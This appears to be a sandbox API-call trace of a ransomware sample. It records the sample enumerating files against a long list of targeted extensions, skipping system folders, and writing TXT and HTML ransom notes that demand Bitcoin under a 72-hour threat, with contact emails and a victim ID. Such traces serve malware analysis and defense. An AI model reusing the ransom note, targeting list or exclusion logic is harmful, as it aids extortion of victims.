	[0176.075] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\", lpString2="Power_7.provxml" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_7.provxml") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_7.provxml"
	[0176.075] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_7.provxml") returned 109
	[0176.075] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0176.076] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_7.provxml", cchLength=0x6d | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_7.provxml") returned 0x6d
	[0176.076] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.076] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_7.provxml", lpSrch="help_decrypt_your_files") returned 0x0
	[0176.076] lstrcpyW (in: lpString1=0x18926c, lpString2="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_7.provxml" | out: lpString1="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_7.provxml") returned="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_7.provxml"
	[0176.076] lstrlenW (lpString="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_7.provxml") returned 109
	[0176.076] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0176.076] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.077] StrStrW (lpFirst=".provxml", lpSrch=".") returned=".provxml"
	[0176.077] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.077] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".provxml") returned 0x0
	[0176.077] FindNextFileW (in: hFindFile=0xfb9470, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9faeae8, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa9faeae8, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa9faeae8, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x93f, dwReserved0=0x360066, dwReserved1=0x7d0032, cFileName="Power_7.provxml", cAlternateFileName="POFE19~1.PRO")) returned 0
	[0176.077] FindClose (in: hFindFile=0xfb9470 | out: hFindFile=0xfb9470) returned 1
	[0176.079] FindClose (in: hFindFile=0xfb9470 | out: hFindFile=0xfb9470) returned 0
	[0176.080] lstrcpyW (in: lpString1=0x189064, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime"
	[0176.080] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\*.*"
	[0176.080] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0176.080] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0176.080] wsprintfW (in: param_1=0x188950, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\HELP_DECRYPT_YOUR_FILES.TXT") returned 121
	[0176.080] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0176.083] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0176.083] WriteFile (in: hFile=0x39c, lpBuffer=0x187d08*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x188c2c, lpOverlapped=0x0 | out: lpBuffer=0x187d08*, lpNumberOfBytesWritten=0x188c2c*=0xc46, lpOverlapped=0x0) returned 1
	[0176.086] CloseHandle (hObject=0x39c) returned 1
	[0176.086] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x187cd8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x187cd8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0176.087] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0176.087] GetUserNameA (in: lpBuffer=0x187bbc, pcbBuffer=0x187cd4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x187cd4) returned 1
	[0176.088] wsprintfW (in: param_1=0x188b58, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0176.089] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0176.089] SetFilePointer (in: hFile=0x39c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0176.089] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0176.089] WriteFile (in: hFile=0x39c, lpBuffer=0x188b58*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x188c34, lpOverlapped=0x0 | out: lpBuffer=0x188b58*, lpNumberOfBytesWritten=0x188c34*=0x30, lpOverlapped=0x0) returned 1
	[0176.089] CloseHandle (hObject=0x39c) returned 1
	[0176.090] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0176.090] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0176.090] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0176.090] wsprintfW (in: param_1=0x188910, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\HELP_DECRYPT_YOUR_FILES.HTML") returned 122
	[0176.090] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0176.091] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0176.091] WriteFile (in: hFile=0x39c, lpBuffer=0x188104*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x188c28, lpOverlapped=0x0 | out: lpBuffer=0x188104*, lpNumberOfBytesWritten=0x188c28*=0x808, lpOverlapped=0x0) returned 1
	[0176.094] CloseHandle (hObject=0x39c) returned 1
	[0176.094] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0176.095] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1880ec, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1880ec*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0176.095] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0176.095] GetUserNameA (in: lpBuffer=0x187fd0, pcbBuffer=0x1880e8 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1880e8) returned 1
	[0176.096] wsprintfA (in: param_1=0x188b18, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0176.096] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0176.097] SetFilePointer (in: hFile=0x39c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0176.097] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0176.097] WriteFile (in: hFile=0x39c, lpBuffer=0x188b18*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x188c30, lpOverlapped=0x0 | out: lpBuffer=0x188b18*, lpNumberOfBytesWritten=0x188c30*=0x43, lpOverlapped=0x0) returned 1
	[0176.097] CloseHandle (hObject=0x39c) returned 1
	[0176.097] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\*.*" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\*.*"), lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbde4e9af, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbde4e9af, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x827dc55d, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x360066, dwReserved1=0x7d0032, cFileName=".", cAlternateFileName="")) returned 0xfb91b0
	[0176.098] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\*.*") returned 97
	[0176.098] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0176.098] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\*.*", cchLength=0x61 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\*.*") returned 0x61
	[0176.098] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.098] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\*.*", lpSrch="windows") returned 0x0
	[0176.098] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.099] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\*.*", lpSrch="boot") returned 0x0
	[0176.099] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.099] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\*.*", lpSrch="system volume information") returned 0x0
	[0176.099] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.099] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0176.099] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.099] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\*.*", lpSrch="temp") returned 0x0
	[0176.100] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.100] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\*.*", lpSrch="program files") returned 0x0
	[0176.100] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.100] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\*.*", lpSrch="program files (x86)") returned 0x0
	[0176.100] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.100] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\*.*", lpSrch="appdata") returned 0x0
	[0176.100] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.100] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\*.*", lpSrch="application data") returned 0x0
	[0176.101] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.101] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\*.*", lpSrch="winnt") returned 0x0
	[0176.101] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.101] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\*.*", lpSrch="tmp") returned 0x0
	[0176.101] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.101] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\*.*", lpSrch="cache") returned 0x0
	[0176.101] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.101] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\*.*", lpSrch="temporary internet files") returned 0x0
	[0176.102] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.102] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\*.*", lpSrch="webcache") returned 0x0
	[0176.102] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.102] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\*.*", lpSrch="inetcache") returned 0x0
	[0176.102] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
